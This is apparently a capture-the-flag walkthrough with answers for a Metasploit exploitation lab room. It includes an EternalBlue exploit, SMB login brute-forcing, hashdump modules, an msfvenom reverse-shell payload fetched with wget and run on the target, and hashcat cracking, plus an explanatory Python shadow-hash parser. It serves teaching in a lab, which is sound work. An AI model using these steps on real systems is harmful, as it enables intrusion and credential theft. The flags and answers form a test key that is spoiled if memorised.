
Metasploit: Exploitation

This guide contains the answers, and the steps needed to reach them, for the Metasploit: Exploitation room.


Scanning

  1. How many ports are open on the target system?
use auxiliary/scanner/portscan/tcp

(Screenshot: Portscan)

Answer: 5

  2. Using the relevant scanner, what NetBIOS name can you see?
use auxiliary/scanner/discovery/udp_sweep

(Screenshot: Netbios)

Answer: ACME IT SUPPORT

  3. What is running on port 8000?
nmap -sV 10.10.162.76

(Screenshot: Nmap)

Answer: WebFS/1.21

  4. What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task.
use auxiliary/scanner/smb/smb_login

(Screenshot: Smb)

Answer: leo1234

The Metasploit Database

Let's try to replicate what they are doing. First we need to start the database, and then Metasploit.

systemctl start postgresql

sudo msfdb init

(Screenshot: Initialize)

Now we can interact with the database with the following commands:

db_status                  -> Check database status
workspace                  -> List workspaces
workspace -a tryhackme     -> Add a workspace
workspace default          -> Change active workspace

(Screenshot: Msf)

db_nmap -p- 10.10.162.76   -> Perform an nmap scan and output results to the database

(Screenshot: Scan)

Vulnerability Scanning

  1. Who wrote the module that allows us to check SMTP servers for open relay?

Look up the corresponding module and run info.

use auxiliary/scanner/smtp/smtp_relay
info

(Screenshot: Smtp)

Answer: Campbell Murray

Exploitation

  1. Exploit one of the critical vulnerabilities on the target VM

We can do some scans to look for particular vulnerabilities. One easy thing to check is the host OS version.

(Screenshot: Host)

Looks like this might be vulnerable to the EternalBlue exploit (MS17-010).

use exploit/windows/smb/ms17_010_eternalblue

(Screenshot: Exploited)

  2. What is the content of the flag.txt file?

Search through the user folder to find and read the flag.

(Screenshot: Flag)

Answer: THM-5455554845

  3. What is the NTLM hash of the password of the user "pirate"?
use post/windows/gather/hashdump

(Screenshot: Hash)

Answer: 8ce9a3ebd1647fcc5e04025019f4b875

Msfvenom

  1. Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type "sudo su" to get a root shell, this will make things easier.
ssh murphy@10.10.164.113

Use the provided password to log in, then switch to the root user with sudo su.

  2. Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.18.78.136 lport=1337 -f elf -o shell.elf

(Screenshot: Creation)

  3. Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_MACHINE_IP:9000/shell.elf to download it to the target machine).
On our AttackBox:
python -m http.server 8080

On the target machine:
wget 10.18.78.136:8080/shell.elf

(Screenshot: Transfer)

  4. Get a meterpreter session on the target machine.

First set up the handler in Metasploit, then change the file permissions, and lastly run the file on the target machine.

use exploit/multi/handler

(Screenshot: Handler)

chmod +x shell.elf

./shell.elf

(Screenshot: Run)

(Screenshot: Connection)

  5. Use a post exploitation module to dump hashes of other users on the system.
use post/linux/gather/hashdump

(Screenshot: Hash)

  6. What is the other user's password hash?

The hash can be found in the previous image. However, we could even go a step further and try to crack the hash with hashcat. The $6$ prefix marks a sha512crypt hash, which is hashcat mode 1800, and -a 0 selects a straight wordlist attack (the original -a 3 would start a mask attack instead of using the wordlist).

echo '$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0' > passwd.hash
hashcat -m 1800 -a 0 passwd.hash /usr/share/wordlists/rockyou.txt

(Screenshot: Hashcat)

Answer: $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
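To make clear what the hashdump output actually contains and why the $6$ prefix maps to hashcat mode 1800, here is an added Python example (not part of the original walkthrough or of Metasploit) that parses shadow-style lines, separates locked accounts from real hashes, and reports each hash's crypt scheme and matching hashcat mode. The user names and the $5$ line are constructed; only the sha512crypt hash is the one from this room.

```python
"""Classify password fields from hashdump / /etc/shadow style lines by mapping the
crypt(3) "$id$" prefix to its scheme and to the matching hashcat -m mode."""
import re
from dataclasses import dataclass
from typing import List, Optional

# crypt(3) modular-crypt id -> (scheme, hashcat hash mode)
CRYPT_SCHEMES = {"1": ("md5crypt", 500), "5": ("sha256crypt", 7400), "6": ("sha512crypt", 1800)}
# $id$[rounds=N$]salt$hash: the layout shared by md5crypt, sha256crypt and sha512crypt
CRYPT_RE = re.compile(r"^\$(?P<id>[156])\$(?:rounds=(?P<rounds>\d+)\$)?"
                      r"(?P<salt>[./0-9A-Za-z]{1,16})\$(?P<hash>[./0-9A-Za-z]+)$")
# Constructed sample: user names are placeholders, the $6$ hash is the one dumped
# in this room, and the $5$ hash is fabricated only to exercise rounds= parsing.
SAMPLE_LINES = [
    "root:!:19000:0:99999:7:::",
    "daemon:*:19000:0:99999:7:::",
    "otheruser:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:19000:0:99999:7:::",
    "svc:$5$rounds=10000$saltsalt$AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:19000:0:99999:7:::",
]

@dataclass
class ShadowEntry:
    user: str
    raw: str                      # password field exactly as found
    status: str = "unknown"       # "locked", "hashed" or "unknown"
    scheme: Optional[str] = None
    hashcat_mode: Optional[int] = None
    salt: Optional[str] = None
    rounds: Optional[int] = None  # None = scheme default (5000 for sha*crypt)

def parse_shadow_line(line: str) -> ShadowEntry:
    """Split one shadow-style line and classify its password field."""
    fields = line.rstrip("\n").split(":")
    user, pw = fields[0], (fields[1] if len(fields) > 1 else "")
    entry = ShadowEntry(user=user, raw=pw)
    # "*", "!"/"!!" (also "!" prefixed onto a hash by passwd -l) and an empty
    # field all mean no usable password hash: nothing for hashcat to do.
    if pw in ("", "*") or pw.startswith("!"):
        entry.status = "locked"
        return entry
    m = CRYPT_RE.match(pw)
    if m:  # anything else (e.g. bcrypt, yescrypt) stays "unknown" on purpose
        entry.scheme, entry.hashcat_mode = CRYPT_SCHEMES[m["id"]]
        entry.salt = m["salt"]
        entry.rounds = int(m["rounds"]) if m["rounds"] else None
        entry.status = "hashed"
    return entry

def crackable(lines: List[str]) -> List[ShadowEntry]:  # entries with a recognised hash
    return [e for e in map(parse_shadow_line, lines) if e.status == "hashed"]
```

Running crackable(SAMPLE_LINES) reports only otheruser (sha512crypt, mode 1800) and svc (sha256crypt, mode 7400, 10000 rounds); the locked root and daemon entries are skipped.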